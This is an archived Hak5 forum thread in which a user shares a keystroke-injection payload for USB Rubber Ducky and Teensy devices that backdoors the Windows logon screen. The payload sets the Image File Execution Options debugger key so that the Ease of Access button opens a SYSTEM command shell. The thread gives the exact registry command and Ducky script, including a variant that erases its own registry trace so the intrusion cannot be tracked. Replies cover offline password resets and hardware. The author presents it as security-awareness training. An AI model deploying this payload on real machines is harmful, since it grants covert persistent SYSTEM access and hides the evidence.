Jump to content
Hak5 Forums

Archived

This topic is now archived and is closed to further replies.

PCFreak

[Version 1] Payload - Utilman Exploit Without Touching A File

Recommended Posts

Hi,

I recently created a very nice utilman exploit, that I like to share with you.

The difference to all other methods currently used with the ducky is, that my version does not need to change any system file. :rolleyes: I just set a registry key and all is done.

I will explain in detail here how it works.

The current available utilman exploits using the Ducky change the user rights of utilman.exe, so that it can be backed up and replaced with cmd.exe.

This is a huge change to the system and it leaves a lot of traces. <_<

As described in this Microsoft Article about "Launching the debugger automatically",

you can set up your application to start Visual Studio when you launch the application from Windows. Visual Studio will load your application, ready for debugging, but will not commence debugging until you issue an execution command. Having Visual Studio launch the debugger in this way is useful for debugging services and COM out-of-proc servers.

Reading further in this article, you learn how to setup the system, that instead of the "real program" the debugger is executed.

So let's apply that to the utilman exploit.

We just need to tell the system to execute CMD.EXE instead of UTILMAN.EXE to be able to logon to the system just by clicking the "Ease of Access"-button at the logon screen.

Nothing is easier than that, just use this command (as an administrative user):

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f

That's all - Try it out!

So one could now combine the already available payload for an administrative command prompt on Windows 7

GUI
DELAY 50
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
DELAY 200

with this

STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f
ENTER
STRING EXIT
ENTER

and has now the ability to login to this system whenever he wants to just by clicking the "Ease of Access"-button at the logon screen.

You could go one step further by using this code to add the registry key:

STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d "cmd.exe /c start """Utilman Exploit by PCFreak""" cmd.exe /s /k REG DELETE """HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe""" /f &amp;&amp; @echo Enjoy!" /f
ENTER
STRING EXIT
ENTER

This does the same, but when using utilman.exe (Press EoA-button on lock screen) the opening command shell automatically removes its tracks from the registry and stays open, so after

using the exploit it is not trackable any more.

Currently I cannot try this myself with the USB Rubberducky, since I have a german keyboard and with the ducky it is still not possible to switch keyboard layouts but the above code should work.

I have a working code and a demonstration video how it works on my blog (blog.pcfreak.de)

Here is the source code for the Teensy 2.0 board.

http://blog.pcfreak.de/wp-content/upload/most_sophisticated_utilman_exploit.zip

I hope you find this sophisticated method interesting and have fun with it. ;)

Cheers

PCFreak

Share this post


Link to post
Share on other sites

I like it! I wrote the original payload for Utilman. I've never heard of this method before, but I really like the sound of it! Is cmd.exe still ran with SYSTEM level privileges, like Utilman.exe is, though? I doubt that the debugger would cause it not to, but that would really put a dampner on aim of the payload.

Share this post


Link to post
Share on other sites

I like it! I wrote the original payload for Utilman. I've never heard of this method before, but I really like the sound of it! Is cmd.exe still ran with SYSTEM level privileges, like Utilman.exe is, though? I doubt that the debugger would cause it not to, but that would really put a dampner on aim of the payload.

It runs as system as utilman would. The system executes the debugger (which is now cmd.exe) as it would execute utilman!

The replacement (debugger) runs in the same context as the executable would ran originally.

Just try it out.

Cheers

PCFreak

Share this post


Link to post
Share on other sites

This is a great find! I like it.

But it must be used in login user at first time. How can i bypass login? That is, I use it when not login.

thanks.

Share this post


Link to post
Share on other sites

This is a great find! I like it.

But it must be used in login user at first time. How can i bypass login? That is, I use it when not login.

thanks.

The original utilman exploit is usually used to reset the password on Windows 7 machines by booting a Linux Live CD and

copy utilman.exe to utilman.bak

copy cmd.exe to utilman.exe

and then reboot. When pressing the EoA button you can reset the password in the opening system shell.

The goal of my payload was to show our employees in the "IT Security and Safety Training" what an attacker can do if it has 30 seconds access to an unlocked Windows 7 machine.

Believe me, showing them something is better than just telling them! And the USBRubberDucky is the ideal device to do so!

But the technique with the registry key could also be used for the password recovery purpose. Instead of making modifications to utilman.exe it would be easier just to offline edit the registry to do the same.

The nice thing about the Registry method is, that you could auto-delete the key on execution and the system works as it did before.

I am currently thinking about writing a small programm for a Live-Windows-PE-CD and/or Linux that does exactly that.

My idea is, that you just execute

  ResetPass [path to Software hive] [username] [new password]

So just calling

  (Linux)
  ResetPass '/mnt/C/Windows/System32/config/software' "pcfreak" "changeme"

  (Windows)
  ResetPass.exe 'X:\Windows\System32\config\software' "pcfreak" "changeme" 

would place the correct command into the registry that needs to get executed to reset the password for user "pcfreak" to "changeme".

After booting the system and pressing the EoA button you can login with the new password.

When I have the time to code this and it is working I will sure let you know.

Cheers

PCFreak

Share this post


Link to post
Share on other sites

Writing it for linux I'm sure would be a very popular option, as I'm sure I'm not the only one who carries a bootable linux distro on their usb..

Share this post


Link to post
Share on other sites

Forgive me if this is a dumb question; I'm just getting started on this topic. However are registry changes a standard permission for System level users? I cannot change any registry keys on my workplace computer, so would this make the original Utilman epxloit more suitable for the goal of adding an admin account without having prior admin access?

Share this post


Link to post
Share on other sites

Forgive me if this is a dumb question; I'm just getting started on this topic. However are registry changes a standard permission for System level users? I cannot change any registry keys on my workplace computer, so would this make the original Utilman epxloit more suitable for the goal of adding an admin account without having prior admin access?

As a user you only can write to "your" part of the registry which is "HKCU" (HKEY_CURRENT_USER). To be able to write to "HKLM" (HKEY_LOCAL_MACHINE) you need administrative rights.

The original Utilman exploit also needs administrative rights or needs to be applied from an external booted operating system, since it changes files in Windows\system32 directory. The utilman exploit is not a "privilege escalation" exploit. If you have physical access to a machine (which you of course need to plugin the Ducky) you can always get access. The only way to avoid this is to always lock your machine when leaving it and fully encrypt your hard drive.

Concerning your work place computer. Maybe your administrator did the right thing and did not gave you administrative rights or you just did not start regedit or whatever program you use to edit the registry with administrative rights?

I use the utilman exploit with the registry key only for the purpose to show our employees how dangerous it is not to lock your machine.

Cheers

PCFreak

Share this post


Link to post
Share on other sites

If you can, try booting into a Linux distro and use an offline registry editor like chntpw. I know Backtrack comes with chntpw already available, or even maybe using the Offline NT Password and Registry Editor. Here is the link.

Share this post


Link to post
Share on other sites

@PCFreak , which one do you recommend as a replacement for usb rubber ducky . i find it costly . Is the teensy fine for the payloads or should i consider 2.0 , Teensy++ . are payload compatible between different teensy models

Share this post


Link to post
Share on other sites

@PCFreak , which one do you recommend as a replacement for usb rubber ducky . i find it costly . Is the teensy fine for the payloads or should i consider 2.0 , Teensy++ . are payload compatible between different teensy models

I have a Teensy 2.0. It is enough for just emulating a HID device. It costs 16$ and does it exactly what it should. Btw. you can do much more with it, since it also many I/O ports on it. The difference between the Teensy and the ducky is, that the ducky is smaller and that the payload comes from the SD-Card. On the teensy you have to plugin the Teensy to program and the payload is stored in the RAM on the Teensy. You have about 32K available. A normal payload takes about 4k.

I recommend you read this page http://www .irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle and use Irongeeks "phukd" library to make it easier for you.

It depends on you. If you understand a little bit about programming, then the Teensy is a good choice.

If the Ducky would be perfect (Firmware + Encoder) it's price would be okay. At the moment it is too expensive, since the software for the ducky is not very well programmed.

If you have further questions just send me a PM.

Cheers

PCFreak

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×